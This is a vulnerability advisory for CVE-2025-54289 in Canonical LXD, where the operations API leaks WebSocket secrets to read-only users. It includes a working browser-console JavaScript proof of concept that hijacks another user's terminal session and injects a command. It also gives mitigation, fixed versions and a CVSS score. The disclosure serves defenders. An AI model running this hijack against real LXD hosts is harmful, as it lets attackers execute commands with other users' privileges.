Canonical LXD Vulnerable to Privilege Escalation via WebSocket Connection Hijacking in Operations API
LXD's operations API includes secret values necessary for WebSocket connections when retrieving information about running operations. These secret values are used for authentication of WebSocket connections for terminal and console sessions.
Therefore, attackers with only read permissions can use secret values obtained from the operations API to hijack terminal or console sessions opened by other users. Through this hijacking, attackers can execute arbitrary commands inside instances with the victim's privileges.
1. Log in to LXD-UI using an account with read-only permissions
2. Open browser DevTools and execute the following JavaScript code
Note that this JavaScript code uses the /1.0/events API to capture execution events for terminal startup, establishes a websocket connection with that secret, and sends touch /tmp/xxx to the data channel.
```js
(async () => {
class LXDEventsSession {
constructor(callback) {
this.wsBase =
`wss://${window.location.host}/1.0/events?type=operation&all-p
rojects=true`;
this.eventsConn = new WebSocket(this.wsBase);
this.eventsConn.onopen = (event) => {
console.log('Events conn Opened');
};
this.eventsConn.onmessage = (event) => {
callback(event);
};
}}
class LXDWebSocketSession {
constructor(operationId, secrets) {
this.operationId = operationId;
this.secrets = secrets;
this.wsBase =
`wss://${window.location.host}/1.0/operations/${operationId}/w
ebsocket`;
this.connections = {};
this.connections.data = new
WebSocket(${this.wsBase}?secret=${this.secrets['0']});
this.connections.data.onopen = (event) => {
console.log('Data Opened');
this.connections.data.send(new
TextEncoder().encode('touch /tmp/xxx\r'));
}
this.connections.data.onmessage = (event) => {
console.log('[Data]', event.data);
};
this.connections.control = new
WebSocket(${this.wsBase}?secret=${this.secrets.control});
this.connections.control.onopen = (event) => {
console.log('Control Opened');
}
this.connections.control.onmessage = (event) => {
console.log('[Control]', event.data);
};
}
close() {
Object.values(this.connections).forEach(ws => {
if (ws.readyState === WebSocket.OPEN) {
ws.close();
}
});
}
}
const sessions = [];
new LXDEventsSession( (event) => {
const op = JSON.parse(event.data);
const opId = op.metadata.id;const secrets = op.metadata.metadata.fds;
for(const session of sessions){
if(session.operationId === opId){
return;
}
}
sessions.push(new LXDWebSocketSession(opId, secrets))
});
})();
```
5. Have another user (or yourself for testing) start a terminal or console session on an instance
At this time, whoever uses the secret first gains session rights, so it's recommended to intentionally slow down communication speed using DevTools' bandwidth throttling feature for verification.
6. Refresh the attacker's browser tab to stop event listening
7. Have the victim reopen their terminal/console session and verify:
```
$ ls -la /tmp/xxx
```
Attack conditions require that the attacker has read permissions for the project, the victim (a user with higher privileges) opens a terminal or console session, and the attacker hijacks the WebSocket connection at the appropriate timing. Therefore, while successful attacks result in privilege escalation, the attack timing is very critical, making the realistic risk of attack relatively low.
As a fundamental countermeasure, it is recommended to exclude WebSocket connection secret information from operations API responses for read-only users. In the current implementation, the operations API returns all operation information (including secret values) regardless of permission level, which violates the principle of least privilege.
Specifically, in lxd/operations.go, user permissions should be checked, and for users with read-only permissions, WebSocket-related secrets (fds field) should be excluded from operation metadata. This prevents attackers from obtaining secret values, making WebSocket connection hijacking impossible.
| LXD Series | Status |
| ------------- | ------------- |
| 6 | Fixed in LXD 6.5 |
| 5.21 | Fixed in LXD 5.21.4 |
| 5.0 | Ignored - Not critical |
| 4.0 | Ignored - EOL and not critical |
Reported by GMO Flatt Security Inc.
This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity high, availability none.
The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVE-2025-54289 is classified as CWE-1385: Missing Origin Validation in WebSockets. The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.
CVE-2025-54289 is recorded against 2 packages.
Published on 5 November 2025 and last revised on 8 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.
github.com/canonical/lxd has other advisories on record. If you are patching this one, these are worth checking on the same host:
These advisories are the same class of weakness (CWE-1385: Missing Origin Validation in WebSockets) in other software:
Each distribution ships its own build and its own fixed version. Pick the one you run:
Details
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| github.com/canonical/lxd | — | — |
| lxd | 6.1 | 6.5 |
References
Similar Threats
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